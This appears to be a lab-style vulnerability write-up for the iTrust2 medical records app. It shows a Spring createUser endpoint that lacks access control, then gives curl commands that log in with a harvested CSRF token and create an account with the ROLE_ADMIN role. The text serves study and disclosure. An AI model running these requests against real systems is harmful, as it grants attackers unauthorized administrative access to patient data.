iTrust does not use access control protection on some of the user api endpoints.
/**
* Creates a new user from the RequestBody provided, validates it, and saves
* it to the database.
*
* @param userF
* The user to be saved
* @return response
*/
@PostMapping ( BASE_PATH + "/users" )
public ResponseEntity createUser ( @RequestBody final UserForm userF ) {
final User user = new User( userF );
if ( null != User.getByName( user.getUsername() ) ) {
return new ResponseEntity( errorResponse( "User with the id " + user.getUsername() + " already exists" ),
HttpStatus.CONFLICT );
}
try {
user.save();
LoggerUtil.log( TransactionType.CREATE_USER, LoggerUtil.currentUser(), user.getUsername(), null );
return new ResponseEntity( user, HttpStatus.OK );
}
catch ( final Exception e ) {
return new ResponseEntity(
errorResponse( "Could not create " + user.toString() + " because of " + e.getMessage() ),
HttpStatus.BAD_REQUEST );
}
}We first need to login into iTrust to get an authenicated session.
# Get CSRF token from login page
CSRF=$(curl -s --cookie-jar cookies.txt http://172.16.3.26:8080/iTrust2/login | grep _csrf | sed "s/.* value=\"\(.*\)\".*/\1/")
# Login in to iTrust, and store session token (JSESSIONID) in jsession.txt
curl -v http://172.16.3.26:8080/iTrust2/login --cookie cookies.txt --cookie-jar jsession.txt -H "X-XSRF-TOKEN: ${CSRF}" -d "username=er" -d "password=123456"Attack: create a new user insert using REST API.
secretUser='{"username":"patient3","password":"secret","password2":"secret","enabled":1,"role":"ROLE_ADMIN"}'
curl -v 'http://172.16.3.26:8080/iTrust2/api/v1/users' -b jsession.txt -d ${secretUser} -H "Content-Type: application/json" -H "X-XSRF-TOKEN: ${CSRF}"You now can create an user with any role in the system!